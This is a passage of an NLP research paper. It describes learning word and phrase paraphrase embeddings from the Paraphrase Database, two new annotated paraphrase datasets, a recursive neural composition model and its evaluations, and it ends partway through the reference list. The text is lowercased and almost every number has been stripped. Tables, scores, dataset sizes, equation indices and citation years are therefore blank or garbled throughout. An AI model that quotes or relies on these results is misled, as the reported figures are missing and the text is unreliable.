to learn word embeddings for several tasks, including semantic similarity, language mod- eling, predicting human judgments, and classifica- tion (yu and dredze, ; faruqui et al., ). concurrently with our work, it has also been used to construct paraphrase models for short phrases (yu and dredze, ). new paraphrase datasets we created two novel datasets: ( ) annotated- ppdb, a subset of phrase pairs from ppdb which are annotated according to how strongly they rep- resent a paraphrase relationship, and ( ) ml- paraphrase, a re-annotation of the bigram similarity dataset from mitchell and lapata ( ), again an- notated for strength of paraphrase relationship. . annotated-ppdb our motivation for creating annotated-ppdb was to establish a way to evaluate compositional para- phrase models on short phrases. most existing para- phrase tasks focus on words, like simlex- (hill et al., b), or entire sentences, such as the mi- crosoft research paraphrase corpus (dolan et al., ; quirk et al., ). to our knowledge, there are no datasets that focus on the paraphrasability of short phrases. thus, we created annotated-ppdb so that researchers can focus on local compositional phenomena and measure the performance of models directly—avoiding the need to do so indirectly in a sentence-level task. models that have strong perfor- mance on annotated-ppdb can be used to provide more accurate confidence scores for the paraphrases in the ppdb as well as reduce the need for large paraphrase tables altogether. annotated-ppdb was created in a multi-step pro- cess (outlined below) involving various automatic filtering steps followed by crowdsourced human an- notation. one of the aims for our dataset was to col- lect a variety of paraphrase types—we wanted to in- clude pairs that were non-trivial to recognize as well as those with a range of similarity and length. we fo- cused on phrase pairs with limited lexical overlap to avoid including those with only trivial differences. we started with candidate phrases extracted from the first m pairs in the xxl version of the ppdb and then executed the following steps. filter phrases for quality: only those phrases whose tokens were in our vocabulary were retained. next, all duplicate paraphrase pairs were removed; in ppdb, these are distinct pairs that contain the same two phrases with the order swapped. filter by lexical overlap: next, we calculated the word overlap score in each phrase pair and then re- tained only those pairs that had a score of less than . . by word overlap score, we mean the fraction of tokens in the smaller of the phrases with leven- shtein distance ≤ to a token in the larger of the phrases. this was done to exclude less interesting phrase pairs like 〈my dad had, my father had〉 or 〈ballistic missiles, of ballistic missiles〉 that only dif- fer in a synonym or the addition of a single word. select range of paraphrasabilities: to balance our dataset with both clear paraphrases and erroneous pairs in ppdb, we sampled , examples from ten chunks of the first m initial phrase pairs where a chunk is defined as m phrase pairs. select range of phrase lengths: we then selected , phrases from each -example sample that encompassed a wide range of phrase lengths. to do this, we first binned the phrase pairs by their effec- tive size. let n be the number of tokens of length greater than one character in the first phrase and n the same for the second phrase. then the effective size is defined as max(n ,n ). the bins contained pairs of effective size of , , and or more, and pairs were selected from each bin. this gave us a total of , phrase pairs. prune to , : , phrase pairs were then se- lected randomly from the , remaining pairs to note that the confidence scores for phrase pairs in ppdb are based on a weighted combination of features with weights determined heuristically. the confidence scores were used to place the phrase pairs into their respective sets (s, m, l, xl, xxl, etc.), where each larger set subsumes all smaller ones. throughout, our vocabulary is defined as the most common k word types in english wikipedia, following tokenization and lowercasing (see § ). form an initial dataset, annotated-ppdb- k. the phrases were selected so that every phrase in the dataset was unique. annotate with mechanical turk: the dataset was then rated on a scale from - using amazon me- chanical turk, where a score of denoted phrases that are equivalent in a large number of contexts, meant that the phrases had some overlap in mean- ing, and indicated that the phrases were dissimilar or contradictory in some way (e.g., can not adopt and is able to accept). we only permitted workers whose location was in the united states and who had done at least , hits with a % acceptance rate. each example was labeled by annotators and their scores were averaged to produce the final rating. table shows some statistics of the data. overall, the annotated data had a mean deviation (md) of . . table shows that overall, workers found the phrases to be of high quality, as more than two-thirds of the pairs had an average score of at least . also from the ta- ble, we can see that workers had stronger agreement on very low and very high quality pairs and were less certain in the middle of the range. prune to , : to create our final dataset, annotated-ppdb, we selected , phrase pairs from the , annotations. we did this by first bin- ning the phrases into categories: those with scores in the interval [ , . ), those with scores in the in- terval [ . , . ], and those with scores in the interval ( . , ]. we took the phrase pairs with the low- est md in each bin, as these have the most agree- ment about their label, to form annotated-ppdb. these , examples were then randomly split into a development set of examples and a test set of , examples. the development set had an md of . and the test set had an md of . , indicating the final dataset had pairs of higher agreement than the initial , . . ml-paraphrase our second newly-annotated dataset, ml- paraphrase, is based on the bigram similarity task originally introduced by mitchell and lapata md is similar to standard deviation, but uses absolute value instead of squared value and thus is both more intuitive and less sensitive to outliers. score range md % of data [ , ) . . [ , ) . . [ , ) . . [ , ] . . table : an analysis of annotated-ppdb- k extracted from ppdb. the statistics shown are for the splits of the data accord- ing to the average score by workers. md denotes mean devia- tion and % of data refers to the percentage of our dataset that fell into each range. ( ); we refer to the original annotations as the ml dataset. the ml dataset consists of human similarity rat- ings for three types of bigrams: adjective-noun (jn), noun-noun (nn), and verb-noun (vn). through manual inspection, we found that the annotations were not consistent with the notion of similarity central to paraphrase tasks. for instance, television set and television programme were the highest rated phrases in the nn section (based on average anno- tator score). similarly, one of the highest ranked jn pairs was older man and elderly woman. this indi- cates that the annotations reflect topical similarity in addition to capturing functional or definitional simi- larity. therefore, we had the data re-annotated by two authors of this paper who are native english speak- ers. the bigrams were labeled on a scale from - where denotes phrases that are equivalent in a large number of contexts, indicates the phrases are roughly equivalent in a narrow set of contexts, and means the phrases are not at all equivalent in any context. following annotation, we collapsed the rat- ing scale by merging s and s together and s and s together. data ia ρ ia κ ml comp. ρ ml human ρ jn . . . . nn . . . . vn . . . . table : inter-annotator agreement of ml-paraphrase and com- parison with ml dataset. columns and show the inter- annotator agreement between the two annotators measured with spearman ρ and cohen’s κ. column shows the ρ between ml-paraphrase and all of the ml dataset. the last column is the average human ρ on the ml dataset. we tried using mechanical turk here, but due to such short phrases, with few having the paraphrase relationship, workers did not perform well on the task. statistics for the data are shown in table . we show inter-annotator spearman ρ and cohen’s κ in columns and , indicating substantial agreement on the jn and vn portions but only moderate agree- ment on nn. in fact, when evaluating our nn an- notations against those from the original ml data (column ), we find ρ to be . , well below the av- erage human correlation of . (final column) re- ported by mitchell and lapata and also surpassed by pointwise multiplication (mitchell and lapata, ). this suggests that the original nn portion, more so than the others, favored a notion of similar- ity more related to association than paraphrase. paraphrase models we now present parametric paraphrase models and discuss training. our goal is to embed phrases into a low-dimensional space such that cosine similarity in the space corresponds to the strength of the para- phrase relationship between phrases. we use a recursive neural network (rnn) similar to that used by socher et al. ( ). we first use a constituent parser to obtain a binarized parse of a phrase. for phrase p, we compute its vector g(p) through recursive computation on the parse. that is, if phrase p is the yield of a parent node in a parse tree, and phrases c and c are the yields of its two child nodes, we define g(p) recursively as follows: g(p) = f(w [g(c );g(c )] + b) where f is an element-wise activation function (tanh), [g(c );g(c )] ∈ r n is the concatenation of the child vectors, w ∈ rn× n is the composi- tion matrix, b ∈ rn is the offset, and n is the di- mensionality of the word embeddings. if node p has no children (i.e., it is a single token), we define g(p) = w (p) w , where ww is the word embedding matrix in which particular word vectors are indexed using superscripts. the trainable parameters of the model are w , b, and ww. . objective functions we now present objective functions for training on pairs extracted from ppdb. the training data con- sists of (possibly noisy) pairs taken directly from the original ppdb. in subsequent sections, we discuss how we extract training pairs for particular tasks. we assume our training data consists of a set x of phrase pairs 〈x ,x 〉, where x and x are assumed to be paraphrases. to learn the model parame- ters (w,b,ww), we minimize our objective function over the data using adagrad (duchi et al., ) with mini-batches. the objective function follows: min w,b,ww |x| ( ∑ 〈x ,x 〉∈x max( ,δ −g(x ) ·g(x ) + g(x ) ·g(t )) + max( ,δ −g(x ) ·g(x ) + g(x ) ·g(t )) ) + λw (‖w‖ +‖b‖ ) + λww ‖wwinitial −ww‖ ( ) where λw and λww are regularization parameters, wwinitial is the initial word embedding matrix, δ is the margin (set to in all of our experiments), and t and t are carefully-selected negative examples taken from a mini-batch during optimization. the intuition for this objective is that we want the two phrases to be more similar to each other (g(x ) ·g(x )) than either is to their respective neg- ative examples t and t , by a margin of at least δ. selecting negative examples to select t and t in eq. , we simply chose the most similar phrase in the mini-batch (other than those in the given phrase pair). e.g., for choosing t for a given 〈x ,x 〉: t = argmax t:〈t,·〉∈xb\{〈x ,x 〉} g(x ) ·g(t) where xb ⊆ x is the current mini-batch. that is, we want to choose a negative example ti that is sim- ilar to xi according to the current model parameters. the downside of this approach is that we may oc- casionally choose a phrase ti that is actually a true paraphrase of xi. we also tried a strategy in which we selected the least similar phrase that would trig- ger an update (i.e., g(ti)·g(xi) > g(x )·g(x )−δ), but we found the simpler strategy above to work bet- ter and used it for all experiments reported below. discussion the objective in eq. is similar to one used by socher et al. ( ), but with several differ- ences. their objective compared text and projected images. they also did not update the underlying word embeddings; we do so here, and in a way such that they are penalized from deviating from their ini- tialization. also for a given 〈x ,x 〉, they do not select a single t and t as we do, but use the en- tire training set, which can be very expensive with a large training dataset. we also experimented with a simpler objective that sought to directly minimize the squared l - norm between g(x ) and g(x ) in each pair, along with the same regularization terms as in eq. . one problem with this objective function is that the global minimum is and is achieved simply by driv- ing the parameters to . we obtained much better results using the objective in eq. . training word paraphrase models to train just word vectors on word paraphrase pairs (again from ppdb), we used the same objective function as above, but simply dropped the composition terms. this gave us an objective that bears some similarity to the skip-gram objective with negative sampling in word vec (mikolov et al., a). both seek to maximize the dot products of certain word pairs while minimizing the dot products of others. this objective function is: min ww |x| ( ∑ 〈x ,x 〉∈x max( ,δ −w(x )w ·w(x )w + w(x )w ·w(t )w ) + max( ,δ −w(x )w ·w(x )w + w(x )w ·w(t )w ) ) + λww ‖wwinitial −ww‖ ( ) it is like eq. except with word vectors replacing the rnn composition function and with the regular- ization terms on the w and b removed. we further found we could improve this model by incorporating constraints. from our training pairs, for a given word w, we assembled all other words that were paired with it in ppdb and all of their lem- mas. these were then used as constraints during the pairing process: a word t could only be paired with w if it was not in its list of assembled words. experiments – word paraphrasing we first present experiments on learning lexical paraphrasability. we train on word pairs from ppdb and evaluate on the simlex- dataset (hill et al., b), achieving the best results reported to date. . training procedure to learn word vectors that reflect paraphrasability, we optimized eq. . there are many tunable hyper- parameters with this objective, so to make training tractable we fixed the initial learning rates for the word embeddings to . and the margin δ to . then we did a coarse grid search over a parameter space for λww and the mini-batch size. we considered λww values in { − , − , ..., − , } and mini- batch sizes in { , , , }. we trained for epochs for each set of hyperparameters using adagrad (duchi et al., ). for all experiments, we initialized our word vectors with skip-gram vectors trained using word vec (mikolov et al., a). the vectors were trained on english wikipedia (tokenized and lowercased, yielding . b tokens). we used a window size of and a minimum count cut-off of , producing vectors for approximately k word types. we retained vectors for only the k most frequent words, averaging the rest to obtain a single vector for unknown words. we will refer to this set of the k most frequent words as our vocabulary. . extracting training data for training, we extracted word pairs from the lexi- cal xl section of ppdb. we used the xl data for all experiments, including those for phrases. we used xl instead of xxl because xl has better qual- ity overall while still being large enough so that we could be selective in choosing training pairs. there are a total of , pairs. we removed , that either contained numerical digits or words not in our vocabulary. we then removed , re- dundant pairs, leaving us with a final training set of , word pairs. . tuning and evaluation hyperparameters were tuned using the wordsim- (ws ) dataset (finkelstein et al., ), specifi- cally its similarity (ws-s) and relatedness (ws-r) partitions (agirre et al., ). in particular, we tuned to maximize ×ws-s correlation minus the ws-r correlation. the idea was to reward vectors with high similarity and relatively low relatedness, in order to target the paraphrase relationship. we used the december , snapshot. model n sl ρ skip-gram . skip-gram . paragram ws . ∗ + constraints . ∗ hill et al. ( b) . hill et al. ( a) - . inter-annotator agreement n/a . table : results on the simlex- (sl ) word similarity task obtained by performing hyperparameter tuning based on ×ws-s −ws-r and treating sl as a held-out test set. n is word vector dimensionality. a ∗ indicates statistical signifi- cance (p < . ) over the -dimensional skip-gram vectors. after tuning, we evaluated the best hyperparame- ters on the simlex- (sl ) dataset (hill et al., b). we chose sl as our primary test set as it most closely evaluates the paraphrase relationship. even though ws-s is a close approximation to this relationship, it does not include pairs that are merely associated and assigned low scores, which sl does (see discussion in hill et al., b). note that for all experiments we used cosine sim- ilarity as our similarity metric and evaluated the sta- tistical significance of dependent correlations using the one-tailed method of (steiger, ). . results table shows results on sl when improving the initial word vectors by training on word pairs from ppdb, both with and without constraints. the “paragram ws” rows show results when tuning to maximize ×ws-s − ws-r. we also show results for strong skip-gram baselines and the best results from the literature, including the state-of-the-art re- sults from hill et al. ( a) as well as the inter- annotator agreement from hill et al. ( b). the table illustrates that, by training on ppdb, we can surpass the previous best correlations on sl by - % absolute, achieving the best results reported to date. we also find that we can train low-dimensional word vectors that exceed the per- formance of much larger vectors. this is very use- ful as using large vectors can increase both time and memory consumption in nlp applications. to generate word vectors to use for downstream hill et al. ( a) did not report the dimensionality of the vectors that led to their state-of-the-art results. applications, we chose hyperparameters so as to maximize performance on sl . these word vectors, which we refer to as paragram vectors, had a ρ of . on sl . we use them as initial word vectors for the remainder of the paper. . sentiment analysis as an extrinsic evaluation of our paragram word vectors, we used them in a convolutional neural network (cnn) for sentiment analysis. we used the simple cnn from kim ( ) and the binary sentence-level sentiment analysis task from socher et al. ( ). we used the standard data splits, re- moving examples with a neutral rating. we trained on all constituents in the training set while only us- ing full sentences from development and test, giving us train/development/test sizes of , / / , . the cnn uses m-gram filters, each of which is an m×n vector. the cnn computes the inner product between an m-gram filter and each m-gram in an example, retaining the maximum match (so-called “max-pooling”). the score of the match is a single dimension in a feature vector for the example, which is then associated with a weight in a linear classifier used to predict positive or negative sentiment. while kim ( ) used m-gram filters of sev- eral lengths, we only used unigram filters. we also fixed the word vectors during learning (called “static” by kim). after learning, the unigram fil- ters correspond to locations in the fixed word vec- tor space. the learned classifier weights represent how strongly each location corresponds to positive or negative sentiment. we expect this static cnn to be more effective if the word vector space separates positive and negative sentiment. in our experiments, we compared baseline skip- gram embeddings to our paragram vectors. we used adagrad learning rate of . , mini-batches of size , and a dropout rate of . . we used un- igram filters and rectified linear units as the activa- tion (applied to the filter output + filter bias). we trained for epochs, predicting labels on the de- velopment set after each set of , examples. we recorded the highest development accuracy and used those parameters to predict labels on the test set. results are shown in table . we see improve- we did not use constraints during training. word vectors n accuracy (%) skip-gram . skip-gram . paragram . table : test set accuracies when comparing embeddings in a static cnn on the binary sentiment analysis task from socher et al. ( ). ments over the baselines when using paragram vectors, even exceeding the performance of higher- dimensional skip-gram vectors. experiments – compositional paraphrasing in this section, we describe experiments on a variety of compositional phrase-based paraphrasing tasks. we start with the simplest case of bigrams, and then proceed to short phrases. for all tasks, we again train on appropriate data from ppdb and test on various evaluation datasets, including our two novel datasets (annotated-ppdb and ml-paraphrase). . training procedure we trained our models by optimizing eq. using adagrad (duchi et al., ). we fixed the initial learning rates to . for the word embeddings and . for the composition parameters, and the mar- gin to . then we did a coarse grid search over a parameter space for λww , λw , and mini-batch size. for λww , our search space again consisted of { − , − , ..., − , }, for λw it was { − , − , − , }, and we explored batch sizes of { , , , , }. when ini- tializing with paragram vectors, the search space for λww was shifted upwards to be { , , − , − , ..., − } to reflect our in- creased confidence in the initial vectors. we trained only for epochs for each set of parameters. for baselines, we used the same initial skip-gram vectors as in section . . evaluation and baselines for all experiments, we again used cosine similarity as our similarity metric and evaluated the statistical significance using the method of (steiger, ). a baseline used in all compositional experiments is vector addition of skip-gram (or paragram) word vectors. unlike explicit word vectors, where point-wise multiplication acts as a conjunction of features and performs well on composition tasks (mitchell and lapata, ), using addition with skip-gram vectors (mikolov et al., b) gives bet- ter performance than multiplication. . bigram paraphrasability to evaluate our ability to paraphrase bigrams, we consider the original bigram similarity task from mitchell and lapata ( ) as well as our newly- annotated version of it: ml-paraphrase. extracting training data training data for these tasks was extracted from the xl portion of ppdb. the bigram similarity task from mitchell and lapata ( ) contains three types of bigrams: adjective- noun (jn), noun-noun (nn), and verb-noun (vn). we aimed to collect pairs from ppdb that mirrored these three types of bigrams. we found parsing to be unreliable on such short segments of text, so we used a pos tagger (man- ning et al., ) to tag the tokens in each phrase. we then used the word alignments in ppdb to ex- tract bigrams for training. for jn and nn, we ex- tracted pairs containing aligned, adjacent tokens in the two phrases with the appropriate part-of-speech tag. thus we extracted pairs like 〈easy job, simple task〉 for the jn section and 〈town meeting, town council〉 for the nn section. we used a different strategy for extracting training data for the vn sub- set: we took aligned vn tokens and took the closest noun after the verb. this was done to approximate the direct object that would have been ideally ex- tracted with a dependency parse. an example from this section is 〈achieve goal, achieve aim〉. we removed phrase pairs that ( ) contained words not in our vocabulary, ( ) were redundant with oth- ers, ( ) contained brackets, or ( ) had levenshtein distance ≤ . the final criterion helps to ensure that we train on phrase pairs with non-trivial differences. the final training data consisted of , jn pairs, , vn pairs and , nn pairs. baselines in addition to rnn models, we report baselines that use vector addition as the composition function, both with our skip-gram embeddings and paragram embeddings from section . we also compare to several results from prior work. when doing so, we took their best correla- model mitchell and lapata ( ) bigrams ml-paraphrase word vectors n comp. jn nn vn avg jn nn vn avg skip-gram + . . . . . . . . paragram + . ∗ . . ∗ . . ∗ . . ∗‡ . paragram rnn . ∗† . † . ∗‡ . . ∗‡ . † . ∗ . hashimoto et al. ( ) . . . . . . . . mitchell and lapata ( ) . . . . - - - - human - - - - . . . . table : results on the test section of the bigram similarity task of mitchell and lapata ( ) and our newly annotated version (ml-paraphrase). (n) shows the word vector dimensionality and (“comp.”) shows the composition function used: “+” is vector addition and “rnn” is the recursive neural network. the * indicates statistically significant (p < . ) over the skip-gram model, † statistically significant over the {paragram, +} model, and ‡ statistically significant over hashimoto et al. ( ). tions for each data subset. that is, the jn and nn results from mitchell and lapata ( ) use their multiplicative model and the vn results use their di- lation model. from hashimoto et al. ( ) we used their pas-clblm addl and pas-clblm addnl models. we note that their vector dimensionalities are larger than ours, using n = and respec- tively. results results are shown in table . we re- port results on the test portion of the original mitchell and lapata ( ) dataset (ml) as well as the entirety of our newly-annotated dataset (ml- paraphrase). rnn results on ml were tuned on the respective development sections and rnn results on ml-paraphrase were tuned on the entire ml dataset. our rnn model outperforms results from the lit- erature on most sections in both datasets and its av- erage correlations are among the highest. the one subset of the data that posed difficulty was the nn section of the ml dataset. we suspect this is due to the reasons discussed in section . ; for our ml- paraphrase dataset, by contrast, we do see gains on the nn section. we also outperform the strong baseline of adding -dimensional skip-gram embeddings, a model with times the number of parameters, on our ml- paraphrase dataset. this baseline had correlations of . , . , and . on the jn, nn, and vn parti- tions, with an average of . —below the average ρ of the rnn ( . ) and even the {paragram, +} model ( . ). the results obtained here differ from those reported in hashimoto et al. ( ) as we scored their vectors with a newer python implementation of spearman ρ that handles ties (hashimoto, p.c.). interestingly, the type of vectors used to initial- ize the rnn has a significant effect on performance. if we initialize using the -dimensional skip-gram vectors, the average ρ on ml-paraphrase drops to . , below even the {paragram, +} model. . phrase paraphrasability in this section we show that by training a model based on filtered phrase pairs in ppdb, we can ac- tually distinguish between quality paraphrases and poor paraphrases in ppdb better than the original heuristic scoring scheme from ganitkevitch et al. ( ). extracting training data as before, training data was extracted from the xl section of ppdb. similar to the procedure to create our annotated- ppdb dataset, phrases were filtered such that only those with a word overlap score of less than . were kept. we also removed redundant phrases and phrases that contained tokens not in our vocabulary. the phrases were then binned according to their ef- fective size and , examples were selected from bins of effective sizes of , , and more than , cre- ating a training set of , examples. care was taken to ensure that none of our training pairs was also present in our development and test sets. baselines we compare our models with strong lexical baselines. the first, strict word overlap, is the percentage of words in the smaller phrase that are also in the larger phrase. we also include a ver- sion where the words are lemmatized prior to the calculation. we also train a support vector regression model (epsilon-svr) (chang and lin, ) on the fea- tures that are included for each phrase pair in ppdb. we scaled the features such that each lies in the in- terval [− , ] and tuned the parameters using -fold cross validation on our dev set. we then trained on the entire dev set after finding the best performing c and � combination and evaluated on the test set of annotated-ppdb. model word vectors n comp. annotated-ppdb skip-gram + . paragram + . ∗ paragram rnn . ∗†‡ ganitkevitch et al. ( ) . word overlap (strict) . word overlap (lemmatized) . ppdb+svr . table : spearman correlation on annotated-ppdb. the * indicates statistically significant (p < . ) over the skip- gram model, the † indicates statistically significant over the {paragram, +} model, and the ‡ indicates statistically sig- nificant over ppdb+svr. results we evaluated on our annotated-ppdb dataset described in § . . table shows the spear- man correlations on the -example test set. rnn models were tuned on the development set of examples. all other methods had no hyperparame- ters and therefore required no tuning. we note that the confidence estimates from gan- itkevitch et al. ( ) reach a ρ of . on the test set, similar to the results of strict overlap. while - dimensional skip-gram embeddings only reach . , we can improve this to . by fine-tuning them us- ing ppdb (thereby obtaining our paragram vec- tors). by using the paragram vectors to initialize the rnn, we reach a correlation of . , which is better than the ppdb confidence estimates by % absolute. we again consider addition of -dimensional skip-gram embeddings as a baseline, and they con- tinue to perform strongly (ρ = . ). the rnn ini- tialized with paragram vectors does reach a higher ρ ( . ), but the difference is not statistically signif- icant (p = . ). thus we can achieve similarly- strong results with far fewer parameters. this task also illustrates the importance of initial- izing our rnn model with appropriate word embed- dings. an rnn initialized with skip-gram vectors we tuned both parameters over { − , − , ..., }. has a modest ρ of . , well below the ρ of the rnn initialized with paragram vectors. clearly, ini- tialization is important when optimizing non-convex objectives like ours, but it is noteworthy that our best results came from first improving the word vectors and then learning the composition model, rather than jointly learning both from scratch. qualitative analysis score range + rnn [ , ) . . [ , ) . . [ , ) . . [ , ] . . table : average absolute error of addition and rnn models on different ranges of gold scores. we performed a qualitative analysis to uncover sources of error and determine differences between adding paragram vectors and using an rnn ini- tialized with them. to do so, we took the output of both systems on annotated-ppdb and mapped their cosine similarities to the interval [ , ]. we then computed their absolute error as compared to the gold ratings. table shows how the average of these absolute errors changes with the magnitude of the gold rat- ings. the rnn performs better (has lower average absolute error) for less similar pairs. vector addi- tion only does better on the most similar pairs. this is presumably because the most positive pairs have high word overlap and so can be represented effec- tively with a simpler model. to further investigate the differences between these models, we removed those pairs with gold scores in [ , ], in order to focus on pairs with ex- treme scores. we identified two factors that dis- tinguished the performance between the two mod- els: length ratio and the amount of lexical overlap. we did not find evidence that non-compositional phrases, such as idioms, were a source of error as these were not found in ml-paraphrase and only ap- pear rarely in annotated-ppdb. we define length ratio as simply the number of tokens in the smaller phrase divided by the number of tokens in the larger phrase. overlap ratio is the number of equivalent tokens in the phrase pair di- index phrase phrase length ratio overlap ratio gold rnn + scheduled to be held in that will take place in . . . . . according to the paper , the newspaper reported that . . . . . at no cost to without charge to . . . . . ’s surname family name of . . . . . could have an impact on may influence . . . . . to participate actively to play an active role . . . . . earliest opportunity early as possible . . . . . does not exceed is no more than . . . . . table : illustrative phrase pairs from annotated-ppdb with gold similarity > . the last three columns show the gold similarity score, the similarity score of the rnn model, and the similarity score of vector addition. we note that addition performs better when the pairs have high length ratio (rows – ) or overlap ratio (rows – ) while the rnn does better when those values are low (rows – and – respectively). boldface indicates smaller error compared to gold scores. vided by the number of tokens in the smaller of the two phrases. equivalent tokens are defined as to- kens that are either exact matches or are paired up in the lexical portion of ppdb used to train the para- gram vectors. table shows how the performance of the mod- els changes under different values of length ratio and overlap ratio. the values in this table are the per- centage changes in absolute error when using the rnn over the paragram vector addition model. so negative values indicate superior performance by the rnn. length ratio [ , . ] ( . , . ] ( . , ] positive examples - . . . negative examples - . - . - . both - . - . - . overlap ratio [ , ] ( , ] ( , ] positive examples - . . . negative examples - . - . - . both - . - . . table : comparison of the addition and rnn model on phrase pairs of different overlap and length ratios. the values in the table are the percent change in absolute error from the addition model to the rnn model. negative examples are defined as pairs from annotated-ppdb whose gold score is less than and positive examples are those with scores greater than . “both” refers to both negative and positive examples. a few trends emerge from this table. one is that as the length ratio increases (i.e., the phrase pairs are closer in length), addition surpasses the rnn for positive examples. for negative examples, the the bin delimiters were chosen to be uniform over the range of output values of the length ratio ([ . , ] with one out- lier data point removed) and overlap ratio ([ , ]). trend is reversed. the same trend appears for over- lap ratio. examples from annotated-ppdb illustrat- ing these trends on positive examples are shown in table . when considering both positive and negative ex- amples (“both”), we see that the rnn excels on the most difficult examples (large differences in phrase length and less lexical overlap). for easier exam- ples, the two fare similarly overall (- . to . % change), but the rnn does much better on nega- tive examples. this aligns with the intuition that addition should perform well when two paraphrastic phrases have high lexical overlap and similar length. but when they are not paraphrases, simple addition is misled and the rnn’s learned composition func- tion better captures the relationship. this may sug- gest new architectures for modeling composition- ality differently depending on differences in length and amount of overlap. conclusion we have shown how to leverage ppdb to learn state-of-the-art word embeddings and compositional models for paraphrase tasks. since ppdb was cre- ated automatically from parallel corpora, our models are also built automatically. only small amounts of annotated data are used to tune hyperparameters. we also introduced two new datasets to evaluate compositional models of short paraphrases , fill- ing a gap in the nlp community, as currently there are no datasets created for this purpose. successful models on these datasets can then be used to extend the coverage of, or provide an alternative to, ppdb. http://web.engr.illinois.edu/˜wieting / http://web.engr.illinois.edu/~wieting / there remains a great deal of work to be done in developing new composition models, whether with new network architectures or distance functions. in this work, we based our composition function on constituent parse trees, but this may not be the best approach—especially for short phrases. depen- dency syntax may be a better alternative (socher et al., ). besides improving composition, another direction to explore is how to use models for short phrases in sentence-level paraphrase recognition and other downstream tasks. acknowledgements we thank the editor and the anonymous reviewers as well as juri ganitkevitch, dan roth, weiran wang, and kazuma hashimoto for their valuable com- ments and technical assistance. we also thank chris callison-burch, dipanjan das, kuzman ganchev, ellie pavlick, slav petrov, owen rambow, david sontag, oscar täckström, kapil thadani, lyle un- gar, benjamin van durme, and mo yu for helpful conversations. references eneko agirre, enrique alfonseca, keith hall, jana kravalova, marius paşca, and aitor soroa. . a study on similarity and relatedness using distributional and wordnet-based approaches. in proceedings of hu- man language technologies: the annual con- ference of the north american chapter of the associa- tion for computational linguistics, pages – . as- sociation for computational linguistics. ion androutsopoulos and prodromos malakasiotis. . a survey of paraphrasing and textual entailment methods. journal of artificial intelligence research, pages – . colin bannard and chris callison-burch. . para- phrasing with bilingual parallel corpora. in proceed- ings of the rd annual meeting on association for computational linguistics, pages – . associa- tion for computational linguistics. mohit bansal, kevin gimpel, and karen livescu. . tailoring continuous word representations for depen- dency parsing. in proceedings of the annual meeting of the association for computational linguistics. marco baroni and roberto zamparelli. . nouns are vectors, adjectives are matrices: representing adjective-noun constructions in semantic space. in proceedings of the conference on empiri- cal methods in natural language processing, pages – . association for computational linguis- tics. yoshua bengio, réjean ducharme, pascal vincent, and christian janvin. . a neural probabilistic lan- guage model. the journal of machine learning re- search, : – . jonathan berant and percy liang. . semantic pars- ing via paraphrasing. in proceedings of acl. johannes bjerva, johan bos, rob van der goot, and malvina nissim. . the meaning factory: for- mal semantics for recognizing textual entailment and determining semantic similarity. semeval , page . william blacoe and mirella lapata. . a compari- son of vector-based representations for semantic com- position. in proceedings of the joint confer- ence on empirical methods in natural language pro- cessing and computational natural language learn- ing, emnlp-conll ’ , pages – , strouds- burg, pa, usa. association for computational lin- guistics. wauter bosma and chris callison-burch. . para- phrase substitution for recognizing textual entail- ment. in proceedings of the th international confer- ence on cross-language evaluation forum: evalua- tion of multilingual and multi-modal information re- trieval, clef’ , pages – , berlin, heidelberg. springer-verlag. chih-chung chang and chih-jen lin. . libsvm: a library for support vector machines. acm trans- actions on intelligent systems and technology (tist), ( ): . scott c. deerwester, susan t dumais, thomas k. lan- dauer, george w. furnas, and richard a. harshman. . indexing by latent semantic analysis. jasis, ( ): – . bill dolan, chris quirk, and chris brockett. . un- supervised construction of large paraphrase corpora: exploiting massively parallel news sources. in pro- ceedings of coling , pages – , geneva, switzerland, aug –aug . coling. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. j. mach. learn. res., : – , july. anthony fader, luke zettlemoyer, and oren etzioni. . paraphrase-driven learning for open question answering. in proceedings of the st annual meeting of the association for computational linguistics (vol- ume : long papers), pages – , sofia, bul- garia, august. association for computational linguis- tics. manaal faruqui, jesse dodge, sujay kumar jauhar, chris dyer, eduard hovy, and noah a. smith. . retrofitting word vectors to semantic lexicons. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – . lev finkelstein, evgeniy gabrilovich, yossi matias, ehud rivlin, zach solan, gadi wolfman, and eytan ruppin. . placing search in context: the con- cept revisited. in proceedings of the th international conference on world wide web, pages – . acm. j.r. firth. . a synopsis of linguistic theory, - . juri ganitkevitch, benjamin van durme, and chris callison-burch. . ppdb: the paraphrase database. in hlt-naacl, pages – . the as- sociation for computational linguistics. kazuma hashimoto, pontus stenetorp, makoto miwa, and yoshimasa tsuruoka. . jointly learning word representations and composition functions us- ing predicate-argument structures. in proceedings of the conference on empirical methods in natural language processing, doha, qatar, october. associa- tion for computational linguistics. felix hill, kyunghyun cho, sebastien jean, coline devin, and yoshua bengio. a. not all neu- ral embeddings are born equal. arxiv preprint arxiv: . . felix hill, roi reichart, and anna korhonen. b. simlex- : evaluating semantic models with (gen- uine) similarity estimation. corr, abs/ . . yoon kim. . convolutional neural networks for sen- tence classification. in proceedings of the con- ference on empirical methods in natural language processing (emnlp), pages – , doha, qatar, october. association for computational linguistics. christopher d. manning, mihai surdeanu, john bauer, jenny finkel, steven j. bethard, and david mcclosky. . the stanford corenlp natural language pro- cessing toolkit. in proceedings of nd annual meet- ing of the association for computational linguistics: system demonstrations, pages – . yuval marton, chris callison-burch, and philip resnik. . improved statistical machine translation using monolingually-derived paraphrases. in proceedings of the conference on empirical methods in natural language processing, pages – , singapore, au- gust. association for computational linguistics. tomas mikolov, kai chen, greg corrado, and jeffrey dean. a. efficient estimation of word representa- tions in vector space. arxiv preprint arxiv: . . tomas mikolov, ilya sutskever, kai chen, greg s cor- rado, and jeff dean. b. distributed represen- tations of words and phrases and their composition- ality. in advances in neural information processing systems, pages – . jeff mitchell and mirella lapata. . vector-based models of semantic composition. in acl, pages – . citeseer. jeff mitchell and mirella lapata. . composition in distributional models of semantics. cognitive science, ( ): – . jeffrey pennington, richard socher, and christopher d manning. . glove: global vectors for word rep- resentation. proceedings of the empiricial methods in natural language processing (emnlp ), . chris quirk, chris brockett, and william dolan. . monolingual machine translation for paraphrase gen- eration. in dekang lin and dekai wu, editors, pro- ceedings of emnlp , pages – , barcelona, spain, july. association for computational linguis- tics. pushpendre rastogi and benjamin van durme. . augmenting framenet via ppdb. in proceedings of the second workshop on events: definition, detec- tion, coreference, and representation, pages – , bal- timore, maryland, usa, june. association for compu- tational linguistics. fabio rinaldi, james dowdall, kaarel kaljurand, michael hess, and diego mollá. . exploit- ing paraphrases in a question answering system. in proceedings 